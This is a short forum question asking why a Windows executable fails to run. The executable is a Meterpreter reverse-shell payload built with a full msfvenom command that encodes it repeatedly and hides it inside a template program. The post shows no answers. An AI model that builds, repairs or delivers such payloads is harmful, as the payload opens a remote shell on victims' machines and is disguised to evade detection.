When I create a payload with encoding:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=inet adress LPORT=4444 -e x86/shikata_ga_nai -i 512 -x template.exe -f exe -o output.exe
When it's being sent or put on a USB Drive and attempted to be executed it doesn't work and just tells me that I may not have enough permission.
I tried it without encoding or -x but it still didn't work.
Be the First to Respond
Share Your Thoughts